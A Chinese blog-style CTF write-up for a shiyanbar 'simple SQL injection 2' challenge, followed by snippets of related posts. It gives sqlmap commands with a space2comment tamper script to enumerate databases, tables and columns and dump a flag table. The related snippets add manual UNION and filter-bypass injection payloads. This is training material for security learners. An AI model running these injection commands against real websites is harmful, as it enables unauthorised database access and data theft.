实验吧 简单的SQL注入2攻击笔记

最新推荐文章于 2025-05-27 10:34:33 发布
原创 最新推荐文章于 2025-05-27 10:34:33 发布 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何使用sqlmap工具通过SQL注入获取数据库信息。包括确定目标数据库、列出数据库中的表、获取表中的列名及内容等步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

背景:使用kali linux中的sqlmap

1.在进入sqlmao的终端界面后输入    sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment --dbs

其中:1.sqlmap:启动sqlmap。2.-u:参数 指目标的URL。3.--tamper:绕过WAF脚本。4.space2comment :tamper脚本之一用于绕过过滤空格。5.--dbs列举数据库

红色括号中的information_schema数据库和test数据库是MySql数据库安装时自带的,所以我们要找的就是web1。

2.输入    sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment -D web1 --tables

其中:1.-D:后面跟数据库的名字。2.--tables:列举库中的表格


3. sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment -D web1 -T flag --column

其中:1.-T:后面跟表格名字。2.--column列举表格中的列名


4.sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment -D web1 -T flag -C  flag --dump

其中:1.-C后面跟列的名字。2.--dump取出表单所有记录。

结果就出来了

JimGordonXu
关注
portswigger之SQL注入实验笔记
m0_69349614的博客
07-06 1425
实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。这种攻击的第一步是确定查询返回的列数。然后,您将在后续实验中使用此技术来构建完整的攻击。要解决该实验,请通过执行SQL 注入 UNION攻击来确定查询返回的列数,该攻击会返回包含空值的附加行。'+ORDER+BY+3--'+UNION+SELECT+NULL,NULL,NULL--该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 697
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
sql注入攻击实验
05-25
sql注入攻击,先自己搭建一个网站,链接数据库必须用Sa链接
实验吧Web-中-简单sql注入2
weixin_30595035的博客
12-10 125
输入union select、order by这些关键字会提示SQLi detected! 说明对于关键字有防护 输入1 union也会提示SQLi detected! 但是如果去掉空格:1union,则会返回正常,1'and'1'='1(无空格)也返回正常 所以可能是过滤了空格。 于是用/**/ 或++代替掉空格。 1'/**/union/**/sele...
0527漏洞原理:SQL注入笔记
最新发布
ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ虽然我不知道为什么ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ
05-27 658
定义:动态网站工作流程:攻击手段:危害: 输入过滤:参数化查询:最小权限原则:错误处理:WAF防护: 假设字符型,再添加单引号,报错。假设不成立,为数字型id=17%20order%20by%205--+爆破查询列数长度为25查询显示位数id=17%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+id=-1%20unio……获取库名id=-1%20union%20select%2
实验吧-简单sql注入2
臭nana的博客
01-10 285
看到网上手工的wp那么多,就写一个sqlmap的 直接kali终端一条指令sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php --dump --batch --tamper=space2comment 拿到flag
web安全漏洞-SQL注入攻击实验
m0_63645854的博客
09-13 1746
本文主要介绍了sql显注的漏洞判断原理,sqlmap工具的使用以及分析SQL注入漏洞的成因
实验吧——简单SQL注入2
box
07-06 177
首先输入1,发现有将数据库的查询结果显示出来 输入单引号,发现错误,这时候可以猜测后台查询语句:select name from table where id=‘xxx’; 可以先尝试万能密码 ‘=’ 查询语句就变成 select name from table where id=’’=’’; 会把所以结果都显示出来一共三条记录 接下来继续测试,输入’=‘select,或者’=‘or等等发现仍...
Dvwa之SQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1159
SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwa的sql注入的相关笔记。仅供学习。 ​
DVWA靶场SQL注入实测笔记(小白自查)-LOW SECURITY
2401_83237906的博客
04-06 1189
所以联想到把0x7e换成database()是不是也能正常返回值,经过尝试,发现返回空,没报错都,所以这个0x7e不敢丢,直接加也不行,加逗号也不行(两个位置放3个参数),怎么合在一起,把两列变成一列?
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
m0_74824002的博客
12-13 1213
Hi~ o( ̄▽ ̄)ブ,我是一名刚刚开始学习网安的新手。在做PortSwigger实验室(也就是BurpSuit官方做的靶场和学习中心)题目的时候发现对于新手来说还是有很多问题的。上网搜索相关文章发现可能是官方跟新了靶场的题目,导致很多文章已经“货不对板”了。思来想去最后决定自己来写一篇通关文章!如果有什么地方写的不好或者有什么错误欢迎大伙指出批评~~ps:该文章包含大量我作为初学者在解题过程中的学习过程和内容,可能会显得很臃肿。
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
sql注入实例--安全等级
12-26
使用WebGoat,根据提示信息 ,完成包括Injection Flaw大类下的String SQL注入,Numeric SQL注入,Log Spoofing,XPATH Injection等安全弱点的攻击测试。
SQL注入攻击实战演练
Appleteachers的博客
04-20 991
今天要介绍的是SQL注入实验SQL注入攻击的学习,我们更多的目的是为了学习攻击技术和防范策略,而不是刻意去攻击数据库。 首先我们先进入实验地址《SQL 注入》。 SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,实质就是将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻
[CTF]简单sql注入2
胖胖的ALEX
06-26 694
类型:web 网址:http://www.shiyanbar.com/ctf/1908 攻击sql注入 一句话总结: id有回显的sql注入(手工) Writeup: 测试发现过滤空格,用/**/代替空格 爆数据库名称: 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/...
决斗场 - 实验吧 WEB 简单sql注入2
RaAlGhul的博客
11-15 777
题目链接:http://www.shiyanbar.com/ctf/1908 简单sql注入……2? 做完这题感觉这题比起上一道题区别不大,如果大家对第一题的具体思路做法还不是很了解的话,这里给出小编第一题讲解的传送门:简单sql注入。 首先,进行上一题中的每一步测试,以及尝试提交上一题中得到flag的语句。 当然,如果上一题的语句能在这道题中得到flag那这题还有什么意义呢(
网络安全实验4 SQL注入攻击
热门推荐
一半西瓜的博客
01-30 1万+
赞赏码 & 联系方式 & 个人闲话 【实验名称】SQL注入攻击实验目的】 1.了解SQL注入的基本原理 2.掌握PHP脚本访问MySQL数据库的基本方法 3.掌握程序设计中避免出现SQL注入漏洞的基本方法 【实验原理】 1.什么是SQL注入攻击 所谓SQL注入攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服...
SQL注入攻击复现实验
m0_74579330的博客
04-08 1506
SQL 注入是通过在用户输入或其他外部输入的数据中注入恶意的 SQL 语句,利用应用程序对用户输入处理不当的漏洞,改变原本 SQL 语句的逻辑,从而获取数据库中的敏感信息、篡改数据或者执行其他非法操作。在在浏览器输入127.0.0.1/denglu.html,访问html网页,在用户名输入框和密码输入框中输入“'or'1'='1”,此时显示登录失败,防护成功。输入我们在数据库中写入的用户名和密码,不直接跳转php页面,反而下载php网页的代码。查看php代码中执行的SQL语句,分析异常情况。
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 2616
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
SQL注入练习系统sqli-lab解题实操笔记
- **Web应用防火墙(WAF)**: 使用WAF来识别并阻止SQL注入攻击。 - **内容安全策略(CSP)**: 设置合理的CSP来阻止攻击注入脚本。 ### 4. SQL注入案例分析 对sqli-lab系统的解题笔记可能包含了多个不同的SQL注入案例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值